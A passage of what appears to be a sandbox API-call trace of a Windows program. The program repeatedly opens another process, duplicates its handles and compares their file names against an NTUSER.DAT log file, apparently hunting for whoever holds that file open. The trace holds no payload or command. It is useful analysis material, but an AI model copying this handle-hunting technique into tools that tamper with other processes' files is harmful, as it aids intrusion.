(hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.787] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.787] CloseHandle (hObject=0x1e4) returned 1 [0162.787] CloseHandle (hObject=0x194) returned 1 [0162.788] CloseHandle (hObject=0x1e8) returned 1 [0162.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.788] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.788] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.789] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.789] CloseHandle (hObject=0x1e4) returned 1 [0162.789] CloseHandle (hObject=0x194) returned 1 [0162.790] CloseHandle (hObject=0x1e8) returned 1 [0162.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.790] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.790] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.791] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.791] CloseHandle (hObject=0x1e4) returned 1 [0162.791] CloseHandle (hObject=0x194) returned 1 [0162.791] CloseHandle (hObject=0x1e8) returned 1 [0162.791] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.791] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.792] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.793] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.793] CloseHandle (hObject=0x1e4) returned 1 [0162.793] CloseHandle (hObject=0x194) returned 1 [0162.793] CloseHandle (hObject=0x1e8) returned 1 [0162.793] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.793] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.794] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.795] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.795] CloseHandle (hObject=0x1e4) returned 1 [0162.795] CloseHandle (hObject=0x194) returned 1 [0162.795] CloseHandle (hObject=0x1e8) returned 1 [0162.795] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.795] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.796] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.800] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.800] CloseHandle (hObject=0x1e4) returned 1 [0162.800] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.800] CloseHandle (hObject=0x194) returned 1 [0162.800] CloseHandle (hObject=0x1e8) returned 1 [0162.800] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.800] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.801] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.802] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.802] CloseHandle (hObject=0x1e4) returned 1 [0162.802] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.802] CloseHandle (hObject=0x194) returned 1 [0162.802] CloseHandle (hObject=0x1e8) returned 1 [0162.802] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.802] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.803] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.804] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.804] CloseHandle (hObject=0x1e4) returned 1 [0162.804] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.804] CloseHandle (hObject=0x194) returned 1 [0162.804] CloseHandle (hObject=0x1e8) returned 1 [0162.804] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.804] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.805] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.806] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.806] CloseHandle (hObject=0x1e4) returned 1 [0162.806] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.806] CloseHandle (hObject=0x194) returned 1 [0162.806] CloseHandle (hObject=0x1e8) returned 1 [0162.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.806] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.807] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.808] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.808] CloseHandle (hObject=0x1e4) returned 1 [0162.808] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 1 [0162.808] CloseHandle (hObject=0x194) returned 1 [0162.808] CloseHandle (hObject=0x1e8) returned 1 [0162.808] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.809] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.809] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.810] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.810] CloseHandle (hObject=0x1e4) returned 1 [0162.810] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.810] CloseHandle (hObject=0x194) returned 1 [0162.810] CloseHandle (hObject=0x1e8) returned 1 [0162.810] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.810] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.813] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.819] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.819] CloseHandle (hObject=0x1e4) returned 1 [0162.820] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.820] CloseHandle (hObject=0x194) returned 1 [0162.820] CloseHandle (hObject=0x1e8) returned 1 [0162.820] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.820] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.820] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.823] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.823] CloseHandle (hObject=0x1e4) returned 1 [0162.823] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.823] CloseHandle (hObject=0x194) returned 1 [0162.823] CloseHandle (hObject=0x1e8) returned 1 [0162.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.823] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.824] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.825] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.825] CloseHandle (hObject=0x1e4) returned 1 [0162.825] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.825] CloseHandle (hObject=0x194) returned 1 [0162.825] CloseHandle (hObject=0x1e8) returned 1 [0162.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.825] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.826] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.828] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.829] CloseHandle (hObject=0x1e4) returned 1 [0162.829] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0162.829] CloseHandle (hObject=0x194) returned 1 [0162.829] CloseHandle (hObject=0x1e8) returned 1 [0162.829] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.829] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe38, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.829] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.831] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.831] CloseHandle (hObject=0x1e4) returned 1 [0162.831] _wcsicmp (_Str1="\\ReportingEvents.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0162.831] CloseHandle (hObject=0x194) returned 1 [0162.832] CloseHandle (hObject=0x1e8) returned 1 [0162.832] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.832] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.832] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.832] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.833] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.833] CloseHandle (hObject=0x1e4) returned 1 [0162.833] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.833] CloseHandle (hObject=0x194) returned 1 [0162.833] CloseHandle (hObject=0x1e8) returned 1 [0162.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.834] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1064, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.834] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.835] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.835] CloseHandle (hObject=0x1e4) returned 1 [0162.835] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.835] CloseHandle (hObject=0x194) returned 1 [0162.835] CloseHandle (hObject=0x1e8) returned 1 [0162.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.835] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.836] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.837] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.837] CloseHandle (hObject=0x1e4) returned 1 [0162.837] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.837] CloseHandle (hObject=0x194) returned 1 [0162.837] CloseHandle (hObject=0x1e8) returned 1 [0162.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.837] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.838] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.839] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.839] CloseHandle (hObject=0x1e4) returned 1 [0162.839] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.839] CloseHandle (hObject=0x194) returned 1 [0162.839] CloseHandle (hObject=0x1e8) returned 1 [0162.839] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.839] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.840] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.841] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.841] CloseHandle (hObject=0x1e4) returned 1 [0162.841] CloseHandle (hObject=0x194) returned 1 [0162.841] CloseHandle (hObject=0x1e8) returned 1 [0162.841] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.841] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x110c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.845] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.846] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.846] CloseHandle (hObject=0x1e4) returned 1 [0162.846] CloseHandle (hObject=0x194) returned 1 [0162.846] CloseHandle (hObject=0x1e8) returned 1 [0162.846] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.846] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.847] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.848] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.848] CloseHandle (hObject=0x1e4) returned 1 [0162.848] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.848] CloseHandle (hObject=0x194) returned 1 [0162.848] CloseHandle (hObject=0x1e8) returned 1 [0162.848] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.848] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.850] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.861] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.861] CloseHandle (hObject=0x1e4) returned 1 [0162.861] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.861] CloseHandle (hObject=0x194) returned 1 [0162.861] CloseHandle (hObject=0x1e8) returned 1 [0162.861] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.861] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x118c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.862] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.863] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.863] CloseHandle (hObject=0x1e4) returned 1 [0162.863] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.863] CloseHandle (hObject=0x194) returned 1 [0162.863] CloseHandle (hObject=0x1e8) returned 1 [0162.863] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.863] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.864] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.865] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.865] CloseHandle (hObject=0x1e4) returned 1 [0162.865] _wcsicmp (_Str1="\\wuaueng.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.865] CloseHandle (hObject=0x194) returned 1 [0162.865] CloseHandle (hObject=0x1e8) returned 1 [0162.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0162.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.865] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.867] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.871] 